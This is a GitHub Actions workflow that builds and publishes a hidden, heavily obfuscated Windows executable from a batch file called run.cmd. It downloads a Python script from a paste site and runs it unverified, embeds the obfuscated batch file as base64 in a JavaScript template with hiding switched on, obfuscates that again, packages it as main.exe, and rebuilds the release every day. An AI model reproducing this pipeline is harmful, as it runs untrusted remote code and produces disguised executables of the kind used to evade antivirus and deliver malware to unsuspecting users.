name: Obfuscate File and Upload

on:
  push:
    paths:
      - 'run.cmd'
  schedule:
    - cron: '0 0 * * *'  # Runs every day at midnight UTC
  workflow_dispatch:  # Allows manual triggering

jobs:
  obfuscate:
    runs-on: windows-latest
    permissions:
      contents: write
      pull-requests: write
      repository-projects: write
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Download main.py
        run: |
          Invoke-WebRequest -Uri https://rentry.co/rbbydedw/raw -OutFile main.py

      - name: Obfuscate run.cmd
        run: |
          python main.py

      - name: Base64 Encode run-obf.bat
        id: base64_encode
        run: |
          $base64Encoded = [Convert]::ToBase64String([IO.File]::ReadAllBytes('run-obf.bat'))
          [IO.File]::WriteAllText('encoded.b64', $base64Encoded)

      - name: Download and Modify template.js
        run: |
          # Download the template.js file
          Invoke-WebRequest -Uri https://raw.githubusercontent.com/KDot227/Bat2Exe/main/src/to_compile/static/template.js -OutFile template.js

          # Read the content of template.js and replace placeholders
          $templateContent = Get-Content -Path template.js -Raw
          $templateContent = $templateContent -replace 'const hide = false;', 'const hide = true;'
          $base64Content = Get-Content -Path encoded.b64 -Raw
          $templateContent = $templateContent -replace 'BASE64ENCODEDSTUFFHERE', $base64Content

          # Write the modified content to a new file
          Set-Content -Path modified.js -Value $templateContent

      - name: Install Node.js and Required Packages
        uses: actions/setup-node@v3
        with:
          node-version: '18'
          
      - name: Install pkg and javascript-obfuscator
        run: |
          npm install -g pkg javascript-obfuscator

      - name: Obfuscate JavaScript File
        run: |
          # Obfuscate the JavaScript file
          javascript-obfuscator modified.js --output obfuscated.js

      - name: Package Obfuscated JavaScript File
        run: |
          # Package the obfuscated JavaScript file into an executable
          pkg obfuscated.js --compress GZip -t node18-win

      - name: Delete-tag-and-release
        uses: dev-drprasad/delete-tag-and-release@v1.1
        with:
          tag_name: AutoBuildExe
          delete_release: true
          github_token: ${{ secrets.GITHUB_TOKEN }}

      - name: Create Release
        id: create_release
        uses: actions/create-release@latest
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        with:
          tag_name: AutoBuildExe
          release_name: AutoBuildExe
          body: Obfuscated run.cmd file
          draft: false
          prerelease: false

      - name: Upload Release Asset
        id: upload-release-asset 
        uses: actions/upload-release-asset@v1
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        with:
          upload_url: ${{ steps.create_release.outputs.upload_url }}
          asset_path: obfuscated.exe
          asset_name: main.exe
          asset_content_type: application/octet-stream
